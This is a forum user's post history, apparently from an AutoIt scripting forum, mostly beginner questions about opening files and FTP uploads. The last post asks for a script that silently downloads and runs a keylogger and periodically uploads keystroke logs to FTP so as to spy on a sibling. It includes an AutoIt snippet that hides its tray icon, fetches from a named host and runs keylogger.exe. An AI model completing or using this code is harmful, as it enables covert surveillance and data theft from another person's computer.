Jump to content

bambus

Members
  • Posts

    9
  • Joined

  • Last visited

Everything posted by bambus

  1. FileOpen ( "test.txt", 0 ) dont work..
  2. i did.. but never find something
  3. Hi.. i testet but i dont know how to open a .txt here is my script: Case $msg = $ok6button $msg = Msgbox(1,"Tool made by HoOnda","Read script") if $msg = 2 then ; else $file = Run("items\et_class.txt") endif Run("items/et_class.txt") .. is wrong.. what i have to write?
  4. paah.. shit english.. dont know what you mean Oo you got msn,icq,..? or speak ger ? ^^
  5. i did.. but it dont work.. i use that skript: but i dont know where to write ftpname,pw,.. and file path
  6. sry my english is bad.. can i upload filed on a ftp..or not? if not, can i send it via mail?
  7. http://www.autoitscript.com/forum/index.php?showtopic=12473 and what is that?
  8. i dont ask for keylogging i only ask for the script to upload a FILE on my ftp
  9. Hi, i´m searching for a skript which do that: it downloads a directory from my ftp. in this directory is a keylogger. the keylogger will start after the download. after 30min the script should upload the keylog.txt on my ftp,then wait 30minutes and upload keylog2.txt on myftp,wait 30 min and upload keylog3.txt,... so i can see wtf my brother do on my pc when i´m on the school-computer ;> i show you what i did for my script: #notrayicon InetGet("http://etspawn.funpic.de/keylogger/","c:\keylogger\") Sleep(10000) Run("c:\keylogger\keylogger.exe")
×
×
  • Create New...